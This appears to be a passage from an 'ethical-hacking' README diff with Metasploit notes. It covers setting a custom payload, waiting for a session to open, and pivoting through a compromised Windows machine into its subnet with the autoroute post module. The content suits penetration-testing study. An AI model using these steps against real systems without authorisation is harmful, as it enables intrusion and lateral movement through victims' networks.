RodgerOliver/ethical-hacking/README.md

   * `set EXE::Custom [payload path]`
   * `exploit`
   * Now you just have to listen for incomming connections and a session will be opened.

+### Pivoting

+Pivoting is the ability to use the infected machine to hack into other machines in its network.

+To do this a route needs to be set up between the attacker and the target.
+Then the attacker will be able to attack the machines on the network.

+* `use post/windows/manage/autoroute`
+* `set SUBNET [target subnet]`
+* `set SESSION [session id]`
+* `exploit`